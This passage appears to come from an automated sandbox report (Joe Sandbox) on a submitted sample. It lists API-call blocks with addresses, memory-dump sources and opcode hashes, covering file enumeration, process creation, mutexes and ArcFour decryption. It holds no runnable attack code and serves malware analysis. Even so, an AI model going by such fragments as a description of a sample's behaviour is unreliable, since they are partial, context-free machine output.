                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID: ,
                                                                              • API String ID: 568898626-3772416878
                                                                              • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                              • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                              • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                              • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                              • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                              • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                              • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                              • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                              • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseErrorFirstModeNext
                                                                              • String ID:
                                                                              • API String ID: 4011626565-0
                                                                              • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                              • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                              • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                              • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                              • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 1177325624-0
                                                                              • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                              • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                              • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                              • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00481CEE
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                              • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Show$IconicLong
                                                                              • String ID:
                                                                              • API String ID: 2754861897-0
                                                                              • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                              • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                              • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                              • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                              • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                              • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                              • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                              • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004241F4
                                                                              • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                              • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveFocusIconicShow
                                                                              • String ID:
                                                                              • API String ID: 649377781-0
                                                                              • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                              • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                              • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                              • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 00417D1F
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                              • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Placement$Iconic
                                                                              • String ID:
                                                                              • API String ID: 568898626-0
                                                                              • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                              • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                              • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                              • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CaptureIconic
                                                                              • String ID:
                                                                              • API String ID: 2277910766-0
                                                                              • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                              • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                              • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                              • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                              APIs
                                                                              • IsIconic.USER32(?), ref: 004241AB
                                                                                • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                              • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                              • String ID:
                                                                              • API String ID: 2671590913-0
                                                                              • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                              • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                              • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                              • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                              • Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
                                                                              • Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
                                                                              • Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                              • Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
                                                                              • Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
                                                                              • Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                              • Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
                                                                              • Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
                                                                              • Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
                                                                              APIs
                                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFour
                                                                              • String ID:
                                                                              • API String ID: 2153018856-0
                                                                              • Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                              • Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
                                                                              • Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
                                                                              • Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2939742508.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.2939718755.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2939765016.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2939742508.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000001.00000002.2939718755.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2939765016.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_10000000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
                                                                              • CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
                                                                              • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
                                                                                • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                              • CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
                                                                              • GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
                                                                              • UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
                                                                              • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
                                                                              • CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
